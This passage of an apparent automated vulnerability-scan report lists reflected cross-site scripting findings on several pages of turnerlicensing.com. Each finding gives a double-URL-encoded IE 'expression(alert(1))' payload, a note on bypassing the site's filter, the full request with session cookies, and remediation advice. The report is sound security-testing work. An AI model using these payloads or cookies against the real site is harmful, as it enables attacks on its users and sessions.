GET /turner_deluxe_journals?ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.139. http://www.turnerlicensing.com/turner_frequently_asked_questions [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_frequently_asked_questions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e4b5'style='x:expression(alert(1))'c1c6aa6bced in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_frequently_asked_questions?7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.140. http://www.turnerlicensing.com/turner_mini_wall_calendars [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_mini_wall_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 511bd'style='x:expression(alert(1))'e16792023be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_mini_wall_calendars?511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.141. http://www.turnerlicensing.com/turner_notebooks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_notebooks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1dc3'style='x:expression(alert(1))'ff1d101c939 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_notebooks?b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.142. http://www.turnerlicensing.com/turner_payment_options [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_payment_options
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b6ff'style='x:expression(alert(1))'e20c6c92743 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_payment_options?1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.143. http://www.turnerlicensing.com/turner_privacy_security [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_privacy_security
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa83d'style='x:expression(alert(1))'495e2755ee9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_privacy_security?aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.144. http://www.turnerlicensing.com/turner_puzzles [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_puzzles
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15822'style='x:expression(alert(1))'e24cf7166ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_puzzles?15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.145. http://www.turnerlicensing.com/turner_returns_exchanges [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_returns_exchanges
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 440f0'style='x:expression(alert(1))'ca6e7ba9e71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_returns_exchanges?440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.146. http://www.turnerlicensing.com/turner_shipping_information [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_shipping_information
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 88d10'style='x:expression(alert(1))'7e7db22553f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_shipping_information?88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.147. http://www.turnerlicensing.com/turner_sitemap [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_sitemap
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99d68'style='x:expression(alert(1))'12a287f255c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_sitemap?99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.148. http://www.turnerlicensing.com/turner_tax_information [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_tax_information
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5957e'style='x:expression(alert(1))'a5b65f5204 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_tax_information?5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.149. http://www.turnerlicensing.com/turner_wall_calendars [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_wall_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 997ed'style='x:expression(alert(1))'137726c367f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_wall_calendars?997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;